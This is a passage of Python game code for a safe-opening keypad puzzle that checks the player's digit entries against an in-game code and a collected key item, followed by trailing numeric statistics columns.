"6": Rect(531, 200, 170, 90),
"7": Rect(96, 322, 170, 90),
"8": Rect(315, 322, 170, 90),
"9": Rect(531, 322, 170, 90),
"0": Rect(315, 451, 170, 90),
"cancel": Rect(803, 72, 170, 90),
"clear": Rect(803, 200, 170, 90),
"enter": Rect(803, 322, 170, 90)
}
if not self.passwordMsgFinished:
msg("Enter Password", 1000)
self.passwordMsgFinished=True
correct = ["6", "3", "8", "5", "4", "6"]#original password
for key in keysDict:
if keysDict[key].collidepoint(pos):
if click:
# print("Pressed", key)
if key!="cancel" and key!="clear" and key!="enter":
password.append(key)
if key== "cancel":
self.fade.fadeDark(self.maps.allScenes["finalisland"][0], self.screen, (0, 0))
# Create new scene
self.maps.newScene("finalisland")
# Set player coordinates
self.player.x = 510
self.player.y = 46
# Reset fade
self.fade.reset()
if key=="clear":
password.clear()
if key == "enter":
if not ("key" in self.treasure.collectedItems):
msg("Key Missing", 1500)
else:
if password == correct:
#print("correct password")
self.fade.fadeDark(self.maps.allScenes["finalisland"][0], self.screen, (0, 0))
# Create new scene
self.maps.newScene("finalisland")
# Set player coordinates
self.player.x = 516
self.player.y = 46
# Reset fade
self.fade.reset()
msg("You have succesfully opened the safe.", 3000)
self.gameWon=True
else:
msg("Wrong password. Press clear and try again.", 1500)
| 39.966912
| 250
| 0.664474
| 21,682
| 0.996141
| 0
| 0
| 0
| 0
| 0
| 0
| 7,666
| 0.352201
|